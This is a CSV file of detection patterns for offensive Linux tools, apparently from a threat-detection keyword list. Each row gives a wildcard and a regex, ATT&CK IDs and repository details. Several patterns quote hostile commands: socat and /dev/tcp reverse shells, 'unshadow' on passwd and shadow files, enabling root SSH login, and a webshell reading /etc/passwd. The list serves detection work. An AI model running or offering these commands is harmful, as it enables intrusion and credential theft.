"*/download/v1.2.1/pspy64*",".{0,1000}\/download\/v1\.2\.1\/pspy64.{0,1000}","offensive_tool_keyword","pspy","Monitor linux processes without root permissions","T1057 - T1082 - T1518.001","TA0007","N/A","N/A","Discovery","https://github.com/DominicBreuker/pspy","1","1","#linux","N/A","8","10","4994","516","2023-01-17T21:09:22Z","2018-02-08T21:41:37Z"
"*/pspy -*",".{0,1000}\/pspy\s\-.{0,1000}","offensive_tool_keyword","pspy","Monitor linux processes without root permissions","T1057 - T1514 - T1082","TA0007 - TA0009 - TA0003","N/A","N/A","Discovery","https://github.com/DominicBreuker/pspy","1","0","#linux","N/A","6","10","4994","516","2023-01-17T21:09:22Z","2018-02-08T21:41:37Z"
"*/pspy.git*",".{0,1000}\/pspy\.git.{0,1000}","offensive_tool_keyword","pspy","Monitor linux processes without root permissions","T1057 - T1514 - T1082","TA0007 - TA0009 - TA0003","N/A","N/A","Discovery","https://github.com/DominicBreuker/pspy","1","1","#linux","N/A","6","10","4994","516","2023-01-17T21:09:22Z","2018-02-08T21:41:37Z"
"*/pspy.git*",".{0,1000}\/pspy\.git.{0,1000}","offensive_tool_keyword","pspy","Monitor linux processes without root permissions","T1057 - T1082 - T1518.001","TA0007","N/A","N/A","Discovery","https://github.com/DominicBreuker/pspy","1","1","#linux","N/A","8","10","4994","516","2023-01-17T21:09:22Z","2018-02-08T21:41:37Z"
"*unshadow passwd shadow > *",".{0,1000}unshadow\spasswd\sshadow\s\>\s.{0,1000}","greyware_tool_keyword","unshadow","linux commands abused by attackers - find guid and suid sensitives perm","T1059.003 - T1053.005 - T1105 - T1012 - T1057 - T1083 - T1041 - T1036 - T1035 - T1562.001 - T1564.001 - T1564.005 - T1564.002 - T1564.003 - T1027 - T1070.001 - T1112 - T1136","TA0003 - TA0007 - TA0008 - TA0010 - TA0006 - TA0002","N/A","N/A","Credential Access","N/A","1","0","#linux","greyware_tools high risks of false positives","N/A","N/A","N/A","N/A","N/A","N/A"
"*/viper/Docker/nginxconfig/htpasswd*",".{0,1000}\/viper\/Docker\/nginxconfig\/htpasswd.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","0","#linux","N/A","10","10","78","47","2024-01-09T08:59:52Z","2021-01-20T13:03:45Z"
"*/pspy.go*",".{0,1000}\/pspy\.go.{0,1000}","offensive_tool_keyword","pspy","Monitor linux processes without root permissions","T1057 - T1514 - T1082","TA0007 - TA0009 - TA0003","N/A","N/A","Discovery","https://github.com/DominicBreuker/pspy","1","0","#linux","N/A","6","10","4994","516","2023-01-17T21:09:22Z","2018-02-08T21:41:37Z"
"*/pspy/cmd*",".{0,1000}\/pspy\/cmd.{0,1000}","offensive_tool_keyword","pspy","Monitor linux processes without root permissions","T1057 - T1514 - T1082","TA0007 - TA0009 - TA0003","N/A","N/A","Discovery","https://github.com/DominicBreuker/pspy","1","0","#linux","N/A","6","10","4994","516","2023-01-17T21:09:22Z","2018-02-08T21:41:37Z"
"*screetsec/Sudomy*",".{0,1000}screetsec\/Sudomy.{0,1000}","offensive_tool_keyword","Sudomy","Sudomy is a subdomain enumeration tool to collect subdomains and analyzing domains performing automated reconnaissance (recon) for bug hunting / pentesting","T1595 - T1046","TA0002","N/A","N/A","Reconnaissance","https://github.com/screetsec/Sudomy","1","1","#linux","N/A","N/A","10","2024","381","2024-06-27T10:07:42Z","2019-07-26T10:26:34Z"
"*screetsec/Vegile*",".{0,1000}screetsec\/Vegile.{0,1000}","offensive_tool_keyword","Sudomy","Ghost In The Shell - This tool will setting up your backdoor/rootkits when backdoor already setup it will be hidden your spesisifc process.unlimited your session in metasploit and transparent. Even when it killed. it will re-run again. There always be a procces which while run another process.So we can assume that this procces is unstopable like a Ghost in The Shell","T1587 - T1588 - T1608","N/A","N/A","N/A","Exploitation tool","https://github.com/screetsec/Vegile","1","1","#linux","N/A","N/A","8","714","164","2022-09-01T01:54:35Z","2018-01-02T05:29:48Z"
"*/pspy/cmd/*",".{0,1000}\/pspy\/cmd\/.{0,1000}","offensive_tool_keyword","pspy","Monitor linux processes without root permissions","T1057 - T1082 - T1518.001","TA0007","N/A","N/A","Discovery","https://github.com/DominicBreuker/pspy","1","0","#linux","N/A","8","10","4994","516","2023-01-17T21:09:22Z","2018-02-08T21:41:37Z"
"*sed 's/#PermitRootLogin prohibit-password/PermitRootLogin Yes' /etc/ssh/sshd_config*",".{0,1000}sed\s\'s\/\#PermitRootLogin\sprohibit\-password\/PermitRootLogin\sYes\'\s\/etc\/ssh\/sshd_config.{0,1000}","greyware_tool_keyword","sed","allowing root login for ssh","T1078 - T1078.003 - T1021 - T1021.004","TA0005 - TA0001 - TA0003","N/A","N/A","Defense Evasion","N/A","1","0","#linux","N/A","9","10","N/A","N/A","N/A","N/A"
"*send \*\[ \\*\$BASH\\* = \\*/bin/bash\\* -o \\*\$SHELL\\* = \\*/bin/bash\\* \]*",".{0,1000}send\s\\.{0,1000}\\\[\s\\\\.{0,1000}\\\$BASH\\\\.{0,1000}\s\=\s\\\\.{0,1000}\/bin\/bash\\\\.{0,1000}\s\-o\s\\\\.{0,1000}\\\$SHELL\\\\.{0,1000}\s\=\s\\\\.{0,1000}\/bin\/bash\\\\.{0,1000}\s\\\].{0,1000}","offensive_tool_keyword","EQGRP tools","Equation Group hack tool leaked by ShadowBrokers- from files ftshell File transfer shell","T1055 - T1036 - T1038 - T1203 - T1059","TA0002 - TA0003 - TA0008","N/A","N/A","Data Exfiltration","https://github.com/Artogn/EQGRP-1/blob/master/Linux/bin/ftshell.v3.10.2.1","1","0","#linux","N/A","N/A","1","1","1","2017-04-10T05:02:35Z","2017-04-10T06:59:29Z"
"*/pspy/pspy.go*",".{0,1000}\/pspy\/pspy\.go.{0,1000}","offensive_tool_keyword","pspy","Monitor linux processes without root permissions","T1057 - T1082 - T1518.001","TA0007","N/A","N/A","Discovery","https://github.com/DominicBreuker/pspy","1","1","#linux","N/A","8","10","4994","516","2023-01-17T21:09:22Z","2018-02-08T21:41:37Z"
"*/pspy32*",".{0,1000}\/pspy32.{0,1000}","offensive_tool_keyword","pspy","Monitor linux processes without root permissions","T1057 - T1514 - T1082","TA0007 - TA0009 - TA0003","N/A","N/A","Discovery","https://github.com/DominicBreuker/pspy","1","1","#linux","N/A","6","10","4994","516","2023-01-17T21:09:22Z","2018-02-08T21:41:37Z"
"*/pspy64*",".{0,1000}\/pspy64.{0,1000}","offensive_tool_keyword","pspy","Monitor linux processes without root permissions","T1057 - T1514 - T1082","TA0007 - TA0009 - TA0003","N/A","N/A","Discovery","https://github.com/DominicBreuker/pspy","1","1","#linux","N/A","6","10","4994","516","2023-01-17T21:09:22Z","2018-02-08T21:41:37Z"
"*sendmail -osendmail chmod +x sendmail*",".{0,1000}sendmail\s\-osendmail\schmod\s\+x\ssendmail.{0,1000}","offensive_tool_keyword","EQGRP tools","Equation Group hack tool leaked by ShadowBrokers- file emptybowl.py RCE for MailCenter Gateway (mcgate) - an application that comes with Asia Info Message Center mailserver  buffer overflow allows a string passed to popen() call to be controlled by an attacker  arbitraty cmd execute known to work only for AIMC Version 2.9.5.1","T1053 - T1064 - T1059 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tool","https://github.com/x0rz/EQGRP/blob/master/Linux/bin/emptybowl.py","1","0","#linux","N/A","N/A","10","4099","2069","2017-05-24T21:12:59Z","2017-04-08T14:03:59Z"
"*/psscanner.go*",".{0,1000}\/psscanner\.go.{0,1000}","offensive_tool_keyword","pspy","Monitor linux processes without root permissions","T1057 - T1514 - T1082","TA0007 - TA0009 - TA0003","N/A","N/A","Discovery","https://github.com/DominicBreuker/pspy","1","0","#linux","N/A","6","10","4994","516","2023-01-17T21:09:22Z","2018-02-08T21:41:37Z"
"*SESSID=../../../../*",".{0,1000}SESSID\=\.\.\/\.\.\/\.\.\/\.\.\/.{0,1000}","offensive_tool_keyword","POC","CVE-2024-3400 exploitation attempt","T1210.001 - T1068 - T1190","TA0001 - TA0002","N/A","N/A","Exploitation tool","https://x.com/HackingLZ/status/1780239802496864474","1","1","#linux","N/A","8","10","N/A","N/A","N/A","N/A"
"*SessionGopher*",".{0,1000}SessionGopher.{0,1000}","offensive_tool_keyword","SessionGopher","SessionGopher is a PowerShell tool that finds and decrypts saved session information for remote access tools. It has WMI functionality built in so it can be run remotely. Its best use case is to identify systems that may connect to Unix systems. jump boxes. or point-of-sale terminals.","T1081 - T1087 - T1119","TA0006 - TA0008","N/A","PYSA - WIZARD SPIDER - Dispossessor","Credential Access","https://github.com/Arvanaghi/SessionGopher","1","1","#linux","N/A","N/A","10","1236","169","2022-11-22T21:33:23Z","2017-03-08T02:49:32Z"
"*/psscanner/psscanner.go*",".{0,1000}\/psscanner\/psscanner\.go.{0,1000}","offensive_tool_keyword","pspy","Monitor linux processes without root permissions","T1057 - T1082 - T1518.001","TA0007","N/A","N/A","Discovery","https://github.com/DominicBreuker/pspy","1","1","#linux","N/A","8","10","4994","516","2023-01-17T21:09:22Z","2018-02-08T21:41:37Z"
"*[+] Dropping into shell*",".{0,1000}\[\+\]\sDropping\sinto\sshell.{0,1000}","offensive_tool_keyword","pspy","Monitor linux processes without root permissions","T1057 - T1082 - T1518.001","TA0007","N/A","N/A","Discovery","https://github.com/DominicBreuker/pspy","1","0","#content #linux","N/A","8","10","4994","516","2023-01-17T21:09:22Z","2018-02-08T21:41:37Z"
"*[+] Starting pspy now*",".{0,1000}\[\+\]\sStarting\spspy\snow.{0,1000}","offensive_tool_keyword","pspy","Monitor linux processes without root permissions","T1057 - T1082 - T1518.001","TA0007","N/A","N/A","Discovery","https://github.com/DominicBreuker/pspy","1","0","#content #linux","N/A","8","10","4994","516","2023-01-17T21:09:22Z","2018-02-08T21:41:37Z"
"*\pspy\pspy.go*",".{0,1000}\\pspy\\pspy\.go.{0,1000}","offensive_tool_keyword","pspy","Monitor linux processes without root permissions","T1057 - T1082 - T1518.001","TA0007","N/A","N/A","Discovery","https://github.com/DominicBreuker/pspy","1","0","#linux","N/A","8","10","4994","516","2023-01-17T21:09:22Z","2018-02-08T21:41:37Z"
"*\psscanner\psscanner.go*",".{0,1000}\\psscanner\\psscanner\.go.{0,1000}","offensive_tool_keyword","pspy","Monitor linux processes without root permissions","T1057 - T1082 - T1518.001","TA0007","N/A","N/A","Discovery","https://github.com/DominicBreuker/pspy","1","0","#linux","N/A","8","10","4994","516","2023-01-17T21:09:22Z","2018-02-08T21:41:37Z"
"*3d770299898ab069e0a7f139ed0659991feeb17f73e55b398bf982932c200ef9*",".{0,1000}3d770299898ab069e0a7f139ed0659991feeb17f73e55b398bf982932c200ef9.{0,1000}","offensive_tool_keyword","pspy","Monitor linux processes without root permissions","T1057 - T1082 - T1518.001","TA0007","N/A","N/A","Discovery","https://github.com/DominicBreuker/pspy","1","0","#filehash #linux","N/A","8","10","4994","516","2023-01-17T21:09:22Z","2018-02-08T21:41:37Z"
"*Complete log of pspy (may contain commands run in this test):*",".{0,1000}Complete\slog\sof\spspy\s\(may\scontain\scommands\srun\sin\sthis\stest\)\:.{0,1000}","offensive_tool_keyword","pspy","Monitor linux processes without root permissions","T1057 - T1082 - T1518.001","TA0007","N/A","N/A","Discovery","https://github.com/DominicBreuker/pspy","1","0","#linux","N/A","8","10","4994","516","2023-01-17T21:09:22Z","2018-02-08T21:41:37Z"
"*docker run -it --rm local/pspy*",".{0,1000}docker\srun\s\-it\s\-\-rm\slocal\/pspy.{0,1000}","offensive_tool_keyword","pspy","Monitor linux processes without root permissions","T1057 - T1082 - T1518.001","TA0007","N/A","N/A","Discovery","https://github.com/DominicBreuker/pspy","1","0","#linux","N/A","8","10","4994","516","2023-01-17T21:09:22Z","2018-02-08T21:41:37Z"
"*DominicBreuker/pspy*",".{0,1000}DominicBreuker\/pspy.{0,1000}","offensive_tool_keyword","pspy","Monitor linux processes without root permissions","T1057 - T1514 - T1082","TA0007 - TA0009 - TA0003","N/A","N/A","Discovery","https://github.com/DominicBreuker/pspy","1","1","#linux","N/A","6","10","4994","516","2023-01-17T21:09:22Z","2018-02-08T21:41:37Z"
"*DominicBreuker/pspy*",".{0,1000}DominicBreuker\/pspy.{0,1000}","offensive_tool_keyword","pspy","Monitor linux processes without root permissions","T1057 - T1082 - T1518.001","TA0007","N/A","N/A","Discovery","https://github.com/DominicBreuker/pspy","1","1","#linux","N/A","8","10","4994","516","2023-01-17T21:09:22Z","2018-02-08T21:41:37Z"
"*pspy - version: *",".{0,1000}pspy\s\-\sversion\:\s.{0,1000}","offensive_tool_keyword","pspy","Monitor linux processes without root permissions","T1057 - T1082 - T1518.001","TA0007","N/A","N/A","Discovery","https://github.com/DominicBreuker/pspy","1","0","#linux","N/A","8","10","4994","516","2023-01-17T21:09:22Z","2018-02-08T21:41:37Z"
"*pspy*psscanner",".{0,1000}pspy.{0,1000}psscanner","offensive_tool_keyword","pspy","Monitor linux processes without root permissions","T1057 - T1514 - T1082","TA0007 - TA0009 - TA0003","N/A","N/A","Discovery","https://github.com/DominicBreuker/pspy","1","0","#linux","N/A","6","10","4994","516","2023-01-17T21:09:22Z","2018-02-08T21:41:37Z"
"*pspy32 -*",".{0,1000}pspy32\s\-.{0,1000}","offensive_tool_keyword","pspy","Monitor linux processes without root permissions","T1057 - T1514 - T1082","TA0007 - TA0009 - TA0003","N/A","N/A","Discovery","https://github.com/DominicBreuker/pspy","1","0","#linux","N/A","6","10","4994","516","2023-01-17T21:09:22Z","2018-02-08T21:41:37Z"
"*pspy64 -*",".{0,1000}pspy64\s\-.{0,1000}","offensive_tool_keyword","pspy","Monitor linux processes without root permissions","T1057 - T1514 - T1082","TA0007 - TA0009 - TA0003","N/A","N/A","Discovery","https://github.com/DominicBreuker/pspy","1","0","#linux","N/A","6","10","4994","516","2023-01-17T21:09:22Z","2018-02-08T21:41:37Z"
"*pspy64 -p*",".{0,1000}pspy64\s\-p.{0,1000}","offensive_tool_keyword","pspy","Monitor linux processes without root permissions","T1057 - T1082 - T1518.001","TA0007","N/A","N/A","Discovery","https://github.com/DominicBreuker/pspy","1","0","#linux","N/A","8","10","4994","516","2023-01-17T21:09:22Z","2018-02-08T21:41:37Z"
"*pspy64 -r *",".{0,1000}pspy64\s\-r\s.{0,1000}","offensive_tool_keyword","pspy","Monitor linux processes without root permissions","T1057 - T1082 - T1518.001","TA0007","N/A","N/A","Discovery","https://github.com/DominicBreuker/pspy","1","0","#linux","N/A","8","10","4994","516","2023-01-17T21:09:22Z","2018-02-08T21:41:37Z"
"*pspy-build:latest*",".{0,1000}pspy\-build\:latest.{0,1000}","offensive_tool_keyword","pspy","Monitor linux processes without root permissions","T1057 - T1514 - T1082","TA0007 - TA0009 - TA0003","N/A","N/A","Discovery","https://github.com/DominicBreuker/pspy","1","0","#linux","N/A","6","10","4994","516","2023-01-17T21:09:22Z","2018-02-08T21:41:37Z"
"*pspy-development:latest*",".{0,1000}pspy\-development\:latest.{0,1000}","offensive_tool_keyword","pspy","Monitor linux processes without root permissions","T1057 - T1514 - T1082","TA0007 - TA0009 - TA0003","N/A","N/A","Discovery","https://github.com/DominicBreuker/pspy","1","0","#linux","N/A","6","10","4994","516","2023-01-17T21:09:22Z","2018-02-08T21:41:37Z"
"*pspy-example:latest*",".{0,1000}pspy\-example\:latest.{0,1000}","offensive_tool_keyword","pspy","Monitor linux processes without root permissions","T1057 - T1514 - T1082","TA0007 - TA0009 - TA0003","N/A","N/A","Discovery","https://github.com/DominicBreuker/pspy","1","0","#linux","N/A","6","10","4994","516","2023-01-17T21:09:22Z","2018-02-08T21:41:37Z"
"*pspy-master*",".{0,1000}pspy\-master.{0,1000}","offensive_tool_keyword","pspy","Monitor linux processes without root permissions","T1057 - T1514 - T1082","TA0007 - TA0009 - TA0003","N/A","N/A","Discovery","https://github.com/DominicBreuker/pspy","1","1","#linux","N/A","6","10","4994","516","2023-01-17T21:09:22Z","2018-02-08T21:41:37Z"
"*pspy-testing:latest*",".{0,1000}pspy\-testing\:latest.{0,1000}","offensive_tool_keyword","pspy","Monitor linux processes without root permissions","T1057 - T1514 - T1082","TA0007 - TA0009 - TA0003","N/A","N/A","Discovery","https://github.com/DominicBreuker/pspy","1","0","#linux","N/A","6","10","4994","516","2023-01-17T21:09:22Z","2018-02-08T21:41:37Z"
"* pyLAPS.py*",".{0,1000}\spyLAPS\.py.{0,1000}","offensive_tool_keyword","pyLAPS","A simple way to read and write LAPS passwords from linux.","T1136.001 - T1112 - T1078.001","TA0002 - TA0004 - TA0005","N/A","N/A","Credential Access","https://github.com/p0dalirius/pyLAPS","1","0","#linux","N/A","9","1","79","14","2024-10-28T08:36:38Z","2021-10-05T18:35:21Z"
"*/pyLAPS.git*",".{0,1000}\/pyLAPS\.git.{0,1000}","offensive_tool_keyword","pyLAPS","A simple way to read and write LAPS passwords from linux.","T1136.001 - T1112 - T1078.001","TA0002 - TA0004 - TA0005","N/A","N/A","Credential Access","https://github.com/p0dalirius/pyLAPS","1","1","#linux","N/A","9","1","79","14","2024-10-28T08:36:38Z","2021-10-05T18:35:21Z"
"*/pyLAPS.py*",".{0,1000}\/pyLAPS\.py.{0,1000}","offensive_tool_keyword","pyLAPS","A simple way to read and write LAPS passwords from linux.","T1136.001 - T1112 - T1078.001","TA0002 - TA0004 - TA0005","N/A","N/A","Credential Access","https://github.com/p0dalirius/pyLAPS","1","1","#linux","N/A","9","1","79","14","2024-10-28T08:36:38Z","2021-10-05T18:35:21Z"
"*p0dalirius/pyLAPS*",".{0,1000}p0dalirius\/pyLAPS.{0,1000}","offensive_tool_keyword","pyLAPS","A simple way to read and write LAPS passwords from linux.","T1136.001 - T1112 - T1078.001","TA0002 - TA0004 - TA0005","N/A","N/A","Credential Access","https://github.com/p0dalirius/pyLAPS","1","1","#linux","N/A","9","1","79","14","2024-10-28T08:36:38Z","2021-10-05T18:35:21Z"
"*pyLAPS-main*",".{0,1000}pyLAPS\-main.{0,1000}","offensive_tool_keyword","pyLAPS","A simple way to read and write LAPS passwords from linux.","T1136.001 - T1112 - T1078.001","TA0002 - TA0004 - TA0005","N/A","N/A","Credential Access","https://github.com/p0dalirius/pyLAPS","1","1","#linux","N/A","9","1","79","14","2024-10-28T08:36:38Z","2021-10-05T18:35:21Z"
"*sleep 1; /bin/bash -c \'${shell} 0</dev/tcp/${lhost}/${port} 1>&0 2>&0*",".{0,1000}sleep\s1\;\s\/bin\/bash\s\-c\s\\\'\$\{shell\}\s0\<\/dev\/tcp\/\$\{lhost\}\/\$\{port\}\s1\>\&0\s2\>\&0.{0,1000}","offensive_tool_keyword","Weevely3","Weevely is a web shell designed for post-exploitation purposes that can be extended over the network at runtime","T1059.003 - T1100 - T1071.001 - T1219 - T1078","TA0002 - TA0003 - TA0005 - TA0011 - TA0008","N/A","Sandworm","Resource Development","https://github.com/epinna/weevely3","1","0","#linux","N/A","8","10","3212","605","2024-10-18T04:32:13Z","2014-09-20T10:16:49Z"
"*.php?cmd=cat+/etc/passwd*",".{0,1000}\.php\?cmd\=cat\+\/etc\/passwd.{0,1000}","offensive_tool_keyword","webshell","A collection of webshell","T1505.003 - T1100 - T1190 - T1505.004","TA0003 - TA0011 ","N/A","N/A","Persistence","https://github.com/Peaky-XD/webshell","1","1","#linux","N/A","10","1","N/A","N/A","N/A","N/A"
"*find . -type f -name .htpasswd*",".{0,1000}find\s\.\s\-type\sf\s\-name\s\.htpasswd.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0007 - TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","Discovery","https://github.com/tennc/webshell","1","0","#linux","N/A","9","10","10154","5577","2024-04-08T22:30:44Z","2013-05-23T07:37:56Z"
"*socat TCP4-LISTEN:* fork TCP4:*:*",".{0,1000}socat\sTCP4\-LISTEN\:.{0,1000}\sfork\sTCP4\:.{0,1000}\:.{0,1000}","greyware_tool_keyword","socat","linux commands abused by attackers","T1059.003 - T1053.005 - T1105 - T1012 - T1057 - T1083 - T1041 - T1036 - T1035 - T1562.001 - T1564.001 - T1564.005 - T1564.002 - T1564.003 - T1027 - T1070.001 - T1112 - T1136","TA0011","N/A","Scattered Spider*","C2","N/A","1","0","#linux","greyware_tools high risks of false positives","N/A","N/A","N/A","N/A","N/A","N/A"
"*SUDO_KILLER*",".{0,1000}SUDO_KILLER.{0,1000}","offensive_tool_keyword","SUDO_KILLER","sudo exploitation #Abusing sudo #Exploiting Sudo #Linux Privilege Escalation #OSCP If you like the tool and for my personal motivation so as to develop other tools please a +1 star The tool can be used by pentesters. system admins. CTF players. students. System Auditors and trolls :).","T1078 - T1059 - T1204","TA0002 - TA0003 - TA0004","N/A","N/A","Exploitation tool","https://github.com/TH3xACE/SUDO_KILLER","1","1","#linux","N/A","N/A","10","2253","255","2024-06-17T16:10:56Z","2018-12-07T21:08:02Z"
"*socat TCP:*:* EXEC:""/bin/bash""*",".{0,1000}socat\sTCP\:.{0,1000}\:.{0,1000}\sEXEC\:\""\/bin\/bash\"".{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","#linux","N/A","10","10","3080","656","2024-10-31T22:38:04Z","2021-02-27T00:53:13Z"
"*socat TCP:*:* EXEC:""/bin/sh""*",".{0,1000}socat\sTCP\:.{0,1000}\:.{0,1000}\sEXEC\:\""\/bin\/sh\"".{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","#linux","N/A","10","10","3080","656","2024-10-31T22:38:04Z","2021-02-27T00:53:13Z"
"*socat TCP:*:* EXEC:""bash""*",".{0,1000}socat\sTCP\:.{0,1000}\:.{0,1000}\sEXEC\:\""bash\"".{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","#linux","N/A","10","10","3080","656","2024-10-31T22:38:04Z","2021-02-27T00:53:13Z"
"*socat tcp-connect:*:* exec:*bash -li**pty*stderr*setsid*sigint*sane*",".{0,1000}socat\stcp\-connect\:.{0,1000}\:.{0,1000}\sexec\:.{0,1000}bash\s\-li.{0,1000}.{0,1000}pty.{0,1000}stderr.{0,1000}setsid.{0,1000}sigint.{0,1000}sane.{0,1000}","greyware_tool_keyword","socat","socat reverse shell","T1105 - T1021.001 - T1021.002","TA0002 - TA0008","N/A","Scattered Spider*","C2","https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md","1","0","#linux","greyware tool - risks of False positive !","N/A","10","61798","14749","2024-12-04T11:10:42Z","2016-10-18T07:29:07Z"
"*socat tcp-connect:*:* exec:/bin/sh*",".{0,1000}socat\stcp\-connect\:.{0,1000}\:.{0,1000}\sexec\:\/bin\/sh.{0,1000}","greyware_tool_keyword","socat","socat reverse shell","T1071 - T1573","TA0002 - TA0011","N/A","Scattered Spider*","C2","https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Linux.md","1","0","#linux","N/A","10","10","1445","187","2024-11-18T14:07:04Z","2021-08-16T17:34:25Z"
"*socat TCP-LISTEN:**reuseaddr*fork EXEC:/bin/sh*",".{0,1000}socat\sTCP\-LISTEN\:.{0,1000}.{0,1000}reuseaddr.{0,1000}fork\sEXEC\:\/bin\/sh.{0,1000}","greyware_tool_keyword","socat","socat bind shell","T1071 - T1573","TA0002 - TA0011","N/A","Scattered Spider*","C2","https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Linux.md","1","0","#linux","N/A","10","10","1445","187","2024-11-18T14:07:04Z","2021-08-16T17:34:25Z"
"*./mythic-cli *",".{0,1000}\.\/mythic\-cli\s.{0,1000}","offensive_tool_keyword","tetanus","Mythic C2 agent targeting Linux and Windows hosts written in Rust","T1059 - T1105 - T1219 - T1573 - T1071","TA0011 - TA0010 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/MythicAgents/tetanus","1","0","#linux","N/A","N/A","10","317","44","2024-11-05T17:31:18Z","2022-03-07T20:35:33Z"
"*Spel_RCE_Bash_EXP.py*",".{0,1000}Spel_RCE_Bash_EXP\.py.{0,1000}","offensive_tool_keyword","POC","RCE PoC of 0-day Vulnerability found in Spring Cloud (SPEL)","T1059 - T1210 - T1507","TA0002 - TA0040 - TA0043","N/A","N/A","Exploitation tool","https://github.com/chaosec2021/Spring-cloud-function-SpEL-RCE","1","1","#linux","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
"*/Tool-X.git*",".{0,1000}\/Tool\-X\.git.{0,1000}","offensive_tool_keyword","Tool-X","Tool-X is a Kali Linux hacking tools installer for Termux and linux system. Tool-X was developed for Termux and linux based systems. Using Tool-X you can install almost 370+ hacking tools in Termux (android) and other Linux based distributions. Now Tool-X is available for Ubuntu Debian etc.","T1212 - T1566 - T1550 - T1133","TA0002 - TA0003 - TA0008","N/A","N/A","Exploitation tool","https://github.com/rajkumardusad/Tool-X","1","1","#linux","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
"*rajkumardusad/Tool-X*",".{0,1000}rajkumardusad\/Tool\-X.{0,1000}","offensive_tool_keyword","Tool-X","Tool-X is a Kali Linux hacking tools installer for Termux and linux system. Tool-X was developed for Termux and linux based systems. Using Tool-X you can install almost 370+ hacking tools in Termux (android) and other Linux based distributions. Now Tool-X is available for Ubuntu Debian etc.","T1212 - T1566 - T1550 - T1133","TA0002 - TA0003 - TA0008","N/A","N/A","Exploitation tool","https://github.com/rajkumardusad/Tool-X","1","1","#linux","N/A","N/A","","N/A","","",""
"*/proxy/Tor.py*",".{0,1000}\/proxy\/Tor\.py.{0,1000}","offensive_tool_keyword","tor","Tor is a python based module for using tor proxy/network services on windows - osx - linux with just one click.","T1090 - T1134 - T1188 - T1307 - T1497 - T1560","TA0005 - TA0010 - TA0011","N/A","Dispossessor - APT28 - APT29 - Leviathan","Defense Evasion","https://github.com/r0oth3x49/Tor","1","1","#linux","N/A","N/A","2","151","42","2018-04-21T10:55:00Z","2016-09-22T11:22:33Z"
"*/proxy/tor_paths.py*",".{0,1000}\/proxy\/tor_paths\.py.{0,1000}","offensive_tool_keyword","tor","Tor is a python based module for using tor proxy/network services on windows - osx - linux with just one click.","T1090 - T1134 - T1188 - T1307 - T1497 - T1560","TA0005 - TA0010 - TA0011","N/A","Dispossessor - APT28 - APT29 - Leviathan","Defense Evasion","https://github.com/r0oth3x49/Tor","1","1","#linux","N/A","N/A","2","151","42","2018-04-21T10:55:00Z","2016-09-22T11:22:33Z"
"*/tor-gencert.exe*",".{0,1000}\/tor\-gencert\.exe.{0,1000}","offensive_tool_keyword","tor","Tor is a python based module for using tor proxy/network services on windows - osx - linux with just one click.","T1090 - T1134 - T1188 - T1307 - T1497 - T1560","TA0005 - TA0010 - TA0011","N/A","Dispossessor - APT28 - APT29 - Leviathan","Defense Evasion","https://github.com/r0oth3x49/Tor","1","1","#linux","N/A","N/A","2","151","42","2018-04-21T10:55:00Z","2016-09-22T11:22:33Z"
"*/win/Tor/tor.exe*",".{0,1000}\/win\/Tor\/tor\.exe.{0,1000}","offensive_tool_keyword","tor","Tor is a python based module for using tor proxy/network services on windows - osx - linux with just one click.","T1090 - T1134 - T1188 - T1307 - T1497 - T1560","TA0005 - TA0010 - TA0011","N/A","Dispossessor - APT28 - APT29 - Leviathan","Defense Evasion","https://github.com/r0oth3x49/Tor","1","1","#linux","N/A","N/A","2","151","42","2018-04-21T10:55:00Z","2016-09-22T11:22:33Z"
"*r0oth3x49/Tor.git*",".{0,1000}r0oth3x49\/Tor\.git.{0,1000}","offensive_tool_keyword","tor","Tor is a python based module for using tor proxy/network services on windows - osx - linux with just one click.","T1090 - T1134 - T1188 - T1307 - T1497 - T1560","TA0005 - TA0010 - TA0011","N/A","Dispossessor - APT28 - APT29 - Leviathan","Defense Evasion","https://github.com/r0oth3x49/Tor","1","1","#linux","N/A","N/A","2","151","42","2018-04-21T10:55:00Z","2016-09-22T11:22:33Z"
"*tor_services.py*",".{0,1000}tor_services\.py.{0,1000}","offensive_tool_keyword","tor","Tor is a python based module for using tor proxy/network services on windows - osx - linux with just one click","T1090 - T1134 - T1188 - T1307 - T1497 - T1560","TA0005 - TA0010 - TA0011","N/A","Dispossessor - APT28 - APT29 - Leviathan","Defense Evasion","https://github.com/r0oth3x49/Tor","1","1","#linux","N/A","N/A","2","151","42","2018-04-21T10:55:00Z","2016-09-22T11:22:33Z"
"*TorServiceSetup*",".{0,1000}TorServiceSetup.{0,1000}","offensive_tool_keyword","tor","Tor is a python based module for using tor proxy/network services on windows - osx - linux with just one click.","T1090 - T1134 - T1188 - T1307 - T1497 - T1560","TA0005 - TA0010 - TA0011","N/A","Dispossessor - APT28 - APT29 - Leviathan","Defense Evasion","https://github.com/r0oth3x49/Tor","1","0","#linux","N/A","N/A","2","151","42","2018-04-21T10:55:00Z","2016-09-22T11:22:33Z"
